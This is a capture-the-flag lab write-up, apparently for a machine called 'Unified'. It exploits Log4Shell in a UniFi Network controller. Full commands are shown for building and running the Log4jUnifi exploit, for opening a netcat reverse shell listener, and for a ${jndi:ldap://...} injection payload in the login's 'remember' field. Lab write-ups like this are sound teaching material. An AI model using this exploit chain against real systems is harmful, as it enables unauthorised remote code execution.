Unified

Personal Rating: Easy

Enumeration

Running an extensive nmap scan shows quite a lot (I cut out most of the unneeded):

sudo nmap -p- -sC -sV <IP>

PORT     STATE    SERVICE         REASON         VERSION
22/tcp   open     ssh             syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
6789/tcp filtered ibm-db2-admin   no-response
8080/tcp open     http-proxy      syn-ack ttl 63
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://10.129.104.243:8443/manage
|_http-open-proxy: Proxy might be redirecting requests
8443/tcp open     ssl/nagios-nsca syn-ack ttl 63 Nagios NSCA
| http-title: UniFi Network
|_Requested resource was /manage/account/login?redirect=%2Fmanage
| ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/organizationalUnitName=UniFi/localityName=New York
| Subject Alternative Name: DNS:UniFi
| Issuer: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US/organizationalUnitName=UniFi/localityName=New York
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
<SNIP>

The machine seems to be a Unifiy AP and I am presented a login page when navigating to the IP at port 8443 in the browser. The default credentials ubnt:ubnt did not work. I found the metasploit module multi/http/ubiquiti_unifi_log4shell but it did not work.

Discovering Log4Shell

Researching on the version of the service I found out it should be vulnerable to Log4Shell.

https://pythonawesome.com/exploiting-cve-2021-44228-in-unifi-network-application-for-remote-code-execution-and-more/

yay openjdk #chose (jre11 openjdk)

sudo pacman -S maven #chose (jre11)

sudo pacman -S python-pip

git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi && cd Log4jUnifi && pip install -r requirements.txt

mvn package -f utils/rogue-jndi/

sudo pacman -S docker

git clone https://aur.archlinux.org/docker-git.git
cd docker-git
makepkg -sri

systemctl start docker

git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi
mv Log4jUnifi log4junifi
cd log4junifi
sudo docker build -t log4junifi .

nc -lnvp 4444 #In a separate terminal

sudo docker run -it -v $(pwd)/loot:/log4junifi/loot -p 8090:8090 -p 1389:1389 log4junifi -u https://10.129.104.243:8443 -i 10.10.16.4 -p 4444

This way I could get a shell on the system. Obviously this is the script-kiddy way as I used a prepared rogue jndi server by someone else, but learning to do everything manually did not fit my time plans for this box.

I later found out that I also could have injected a payload of the format ${jndi:ldap://{Tun0 IP Address}/whatever} into the "remember" field at the login page, which would have made things a lot easier.

cat /home/michael/user.txt

6ced<SNIP>a127